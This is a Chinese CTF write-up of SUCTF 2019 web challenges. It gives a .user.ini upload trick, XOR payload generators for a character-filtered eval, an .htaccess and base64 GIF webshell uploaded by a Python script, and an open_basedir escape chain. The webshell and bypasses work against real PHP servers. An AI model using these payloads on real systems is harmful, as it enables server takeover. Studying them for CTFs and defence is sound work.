SUCTF2019复盘

WEB

CheckIn

  • 解题过程
    题目功能是一个文件上传,可以上传jpg、png等文件,但是限制了php,而且还判断了上传的文件头,使用exif_image来判断的,这个很容易绕过,直接随便加一个图片文件头就行,并且上传之后会给出文件所在目录
    ,且上传的内容中不能包含<?字符

尝试了.htaccess,发现不行,换思路,使用.user.ini修改配置文件

或者连接shell管理客户端

注意点:

  1. .user.ini实际上就是一个可以由用户“自定义”的php.ini,我们能够自定义的设置是模式为“PHP_INI_PERDIR 、 PHP_INI_USER”的设置
  2. 前提是含有.user.ini的文件夹下需要有正常的php文件,否则也不能包含了

参考资料:.user.ini文件构成的PHP后门

EasyPHP

  • 解题过程
    首先进行代码审计,如下
<?php
function getTheFlag() {
    // webadmin will remove your upload file every 20 min!!!!
    $userdir = "upload/tmp_" . md5($_SERVER['REMOTE_ADDR']);
    if (!file_exists($userdir)) {
        mkdir($userdir);
    }
    if (!empty($_FILES["file"])) {
        $tmp_name = $_FILES["file"]["tmp_name"];
        $name = $_FILES["file"]["name"];
        $extension = substr($name, strrpos($name, ".") + 1); //substr()返回字符串的子串  strrpos()计算指定字符串在目标字符串中最后一次出现的位置   $extension返回文件的后缀名
        if (preg_match("/ph/i", $extension)) {
            die("^_^");
        }
        //文件后缀名中不能出现大小写的ph字符
        if (mb_strpos(file_get_contents($tmp_name), '<?') !== False) {
            die("^_^");
        } //file_get_contents — 将整个文件读入一个字符串  mb_strpos — 查找字符串在另一个字符串中首次出现的位置
        //文件内容中不能出现'<?'字符
        if (!exif_imagetype($tmp_name)) {
            die("^_^");
        } //exif_imagetype — 判断一个图像的类型
        //要构造图像文件头
        $path = $userdir . "/" . $name;
        @move_uploaded_file($tmp_name, $path); //搬动临时文件到新目录下
        print_r($path);
    }
}

$hhh = @$_GET['_'];

if (!$hhh) {
    highlight_file(__FILE__);
}

if (strlen($hhh) > 18) {
    die('One inch long, one inch strong!');
}

if (preg_match('/[\x00- 0-9A-Za-z\'"\`~_&.,|=[\x7F]+/i', $hhh)) {
    die('Try something else!');
}

$character_type = count_chars($hhh, 3); //count_chars — 返回字符串所用字符的信息 3 - 返回由所有使用了的字节值组成的字符串。
if (strlen($character_type) > 12) {
    die("Almost there!");
}
//最多使用12个字符
eval($hhh);
?>

题目分成两个部分,第一部分是执行getTheFlag函数,第二部分是上传shell
先分析第一部分,类似题目参看ISITDTU CTF 2019 EasyPHP 回顾


参考这两篇文章:
PHP不使用数字,字母和下划线写shell
一道题回顾php异或webshell


正则过滤了绝大部分可用字符串,可以使用多个字符异或进行构造,但是直接调用函数长度明显是不够的,这里可以用GET的方式传入我们想要调用的函数,首先FUZZ出_GET,注意这里需要使字符串去重后小于等于12

Python版本
  target = "_GET"
    payload = ""
    for tar in target:
        for i in range(255):
            temp = 255^i
            if chr(temp) == tar:
                payload = payload+str(hex(i))
                break
    head = "%e9"*4
    payload = payload.replace("0x","%")
    print(head+"^"+payload)

php版本
<?php
$target = "_GET";
$payload = "%ff%ff%ff%ff^";
for ($i = 0; $i < strlen($target); $i++) {
    $re = substr($target, $i, 1);
    for ($j = 1; $j < 255; $j++) {
        $temp = $j ^ 255;
        $temp = chr($temp);
        if ($temp == $re) {
            $payload = $payload . "%" . dechex($j);
            break;
        }
    }
}
echo $payload;

构造出如下payload:${%A0%B8%BA%AB^%ff%ff%ff%ff}{%A0}();&%A0=get_the_flag
接着是第二部分上传文件了进行getshell

#index.html
<!DOCTYPE html>
<html>
<head>
  <title></title>
</head>
<body>
  <form action="http://a9ae29e2-eb3f-4736-843b-88d878315f7b.node1.buuoj.cn/?_=${%e9%e9%e9%e9^%b6%ae%ac%bd}{%bd}();&%bd=get_the_flag" method="post"
  enctype="multipart/form-data">  #enctype 属性规定在发送到服务器之前应该如何对表单数据进行编码
    <label for="file">Filename:</label>
    <input type="file" name="file" id="file" /> 
    <br />
    <input type="submit" name="submit" value="Submit" />
  </form>
</body>
</html>

上传这里需要绕过图片头和<?的检测

    //.htaccess
#define xlogo_width 200
#define xlogo_height 200
AddType application/x-httpd-php .gif
php_value auto_append_file "php://filter/convert.base64-decode/resource=/var/www/html/upload/tmp_f528764d624db129b32c21fbca0cb8d6/evil.gif"
    //evil.gif
GIF89a12PD9waHAgZXZhbCgkX1BPU1RbJ2MnXSk7Pz4=

getshell后访问跟目录时才发现是没有权限的,查看phpinfo的信息可以看到开启了open_basedir

同时还禁用了一些函数

使用蚁剑插件绕过disable_functions
参考:绕过disable_functions 插件应用 SUCTF EasyPHP
注意点:连上去之后再传一个PHP小马,再使用插件进行提权

import requests
import base64

url = "http://7adea2c4-8b2f-4da3-a59f-a1db1559a48b.node1.buuoj.cn/?_=${%fe%fe%fe%fe^%a1%b9%bb%aa}{%fe}();&%fe=get_the_flag"


htaccess = b"""\x00\x00\x8a\x39\x8a\x39
AddType application/x-httpd-php .gif
php_value auto_append_file "php://filter/convert.base64-decode/resource=/var/www/html/upload/tmp_fd40c7f4125a9b9ff1a4e75d293e3080/shell.gif"

"""

shell = b"\x00\x00\x8a\x39\x8a\x39"+b"00"+ base64.b64encode(b"<?php eval($_POST['c']);?>")
#shell = b"\x00\x00\x8a\x39\x8a\x39"+b"00"+ b"<script language='php'>eval($_REQUEST[c]);</script>"

files = [('file',('.htaccess',htaccess,'image/jpeg'))]

data = {"upload":"Submit"}

proxies = {"http":"http://127.0.0.1:8080"}
r = requests.post(url=url, data=data, files=files)#proxies=proxies)
# print r.text


files = [('file',('shell.gif',shell,'image/jpeg'))]
r = requests.post(url=url, data=data, files=files)
print(r.text)

payload:
chdir('img');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');print_r(scandir('/'));
参考资料:
SUCTF2019部分web题解
SUCTF的一些题解
# SUCTF 2019 Writeup

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容